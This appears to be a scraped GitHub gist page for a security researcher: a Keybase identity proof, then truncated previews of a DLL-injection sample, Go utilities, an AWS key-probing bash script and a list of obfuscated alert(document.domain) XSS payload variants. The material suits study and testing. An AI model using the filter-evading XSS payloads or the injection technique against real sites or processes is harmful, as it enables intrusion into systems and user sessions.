I hereby claim:
- I am ice3man543 on github.
- I am ice3man (https://keybase.io/ice3man) on keybase.
- I have a public key whose fingerprint is B6C4 3A56 982D 6B90 371B 715A 6376 B7ED 6C4D 6715
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
/* | |
* createremotethread.c : A Sample DLL injection program showing how to use | |
* CreateRemoteThread to inject a DLL into a process. | |
* | |
* Written By : @ice3man (Nizamul Rana) | |
* Github : https://github.com/ice3man543 | |
*/ | |
#include <stdio.h> | |
#include <windows.h> |
#include <windows.h> | |
BOOL APIENTRY DllMain(HINSTANCE hInstDLL, DWORD fdwReason, LPVOID lpvReserved) | |
{ | |
switch (fdwReason) | |
{ | |
case DLL_PROCESS_ATTACH: | |
MessageBoxA(NULL, "Hello From The Injected DLL", "Injected !", MB_OK | MB_ICONINFORMATION); | |
break; |
#include <windows.h> | |
#include <stdio.h> | |
int main(int argc, char *argv[]) | |
{ | |
printf("\n[*] TestDLL : Test LoadLibraryA Function"); | |
LoadLibrary(argv[1]); | |
printf("\n[-] Done "); | |
getchar(); | |
return 0; |
// Written by ice3man | |
package main | |
import ( | |
"bytes" | |
"compress/gzip" | |
"encoding/base64" | |
"encoding/gob" | |
"fmt" | |
"io" |
package main | |
import ( | |
"bufio" | |
"fmt" | |
"os" | |
) | |
var parameterList []string |
#!/bin/bash | |
# Written by Frans Rosén (twitter.com/fransrosen) | |
_debug="$2" #turn on debug | |
_timeout="20" | |
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
_aws_key="AKIA..." | |
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
package main | |
import ( | |
"bufio" | |
"fmt" | |
"net/url" | |
"os" | |
"strings" | |
) |
// How many ways can you alert(document.domain)? | |
// Comment with more ways and I'll add them :) | |
// I already know about the JSFuck way, but it's too long to add (: | |
// Direct invocation | |
alert(document.domain); | |
(alert)(document.domain); | |
al\u0065rt(document.domain); | |
al\u{65}rt(document.domain); | |
window['alert'](document.domain); |
abc |